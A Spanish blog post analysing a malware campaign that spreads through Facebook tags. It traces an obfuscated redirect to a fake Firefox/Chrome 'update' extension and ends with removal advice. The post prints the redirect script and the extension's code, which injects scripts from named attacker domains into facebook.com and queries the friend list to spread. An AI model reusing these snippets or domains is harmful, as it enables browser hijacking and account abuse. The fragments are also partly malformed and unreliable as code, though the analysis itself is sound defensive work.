Malware se propaga mediante "etiquetas" en Facebook

 

Malware

El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات y según google es Persa… que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta www.xn--mgbaaaaaaaaydd5fee22afff.xn--mgbaam7a8h WDF…!! Pero seguí mas adelante tome la dirección www.sosyalpaket.net al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:

<?php
var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1;
var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1;
var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
if(is_chrome){inst="http://www.sosyalpaket.net/chrome.php"}
else
if(is_firefox){inst="http://www.sosyalpaket.net/firefox.php"}
else
if(is_opera){inst="http://www.sosyalpaket.net/chrome.php"}
else
{var inst="http://www.sosyalpaket.net/chrome.php"}
?>

Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.

Con el siguiente mensaje:

Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.

Mensaje

Lo que me dio risa fue ese mensaje de “Debido a los errores del sistema y vulnerabilidades de seguridad” jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.

https://www.virustotal.com/es/file/8c3f282af8c718b69bcd142adfed63fc1dfde3b08a3677972dd08bf2a787604f/analysis/

y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.

 

File

Y encontré algo que me resulto familiar

if(location.hostname.indexOf("facebook.com") >= 0){
addJavascript('http://sosyalpaket.net/yeni.php');
addJavascript('http://fbmedyahizmetleri.com/bakgel.php');
addJavascript('http://facebookhizmetlerim.com/user.php');
}

En el user.php me tope con:

<?php
https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
?>

Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.

Complemento

Si es que contienen, lo más razonable es eliminarlo.